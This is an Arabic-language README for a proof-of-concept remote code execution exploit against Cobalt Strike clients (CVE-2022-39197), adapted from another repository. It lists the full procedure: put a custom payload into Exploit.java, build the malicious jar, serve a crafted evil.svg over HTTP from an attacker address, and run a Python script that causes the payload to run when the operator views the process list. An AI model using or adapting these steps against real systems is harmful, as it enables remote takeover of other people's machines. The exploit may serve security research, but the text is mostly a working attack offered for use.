
CVE-2022-39197 RCE POC
تم تعديل هذا المشروع من مشروع @its-arun https://github.com/its-arun/CVE-2022-39197
عندما اختبرت السكربت، وجدت أن سكربت frida لا يمكنه الاستعلام عن البيانات بالترتيب الطبيعي. الطريقة هي تعديل سكربت frida لتعديل اسم العملية.
شكرًا للأستاذ @Kai5174 لمساهمته في طريقة الاستغلال.
1、عدّل الأمر الذي يتم تنفيذه مع الحمولة الخاصة بك في EvilJar/src/main/java/Exploit.java، حاليًا يمكنه فقط تشغيل الآلة الحاسبة.
2、قم بالبناء باستخدام jar mvn clean compile assembly:single
4、انقل EvilJar-1.0-jar-with-dependencies.jar من مجلد EvilJar/target/ إلى مجلد serve/
5、عدّل serve\evil.svg واستبدل [attacker]
6、قدّم الملفات باستخدام python3 -m http.server 8080
7、أنشئ beacon.exe بإصدار C2 أقل من أو يساوي 4.7
8、تحتاج إلى تنفيذ سكربت py على نظام Windows ليتصل الجهاز، واتخاذ إجراءات مضادة عندما يصل العميل إلى قائمة العمليات ويرى عملية beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
سيتم تشغيل الحمولة بمجرد قيام المستخدم بالتمرير عبر قائمة العمليات (Process List)
ويندوز

ماك

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — يوجد تحليل رائع ومتعمق لهذه الثغرة الأمنية https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
مُعدَّل من https://github.com/its-arun/CVE-2022-39197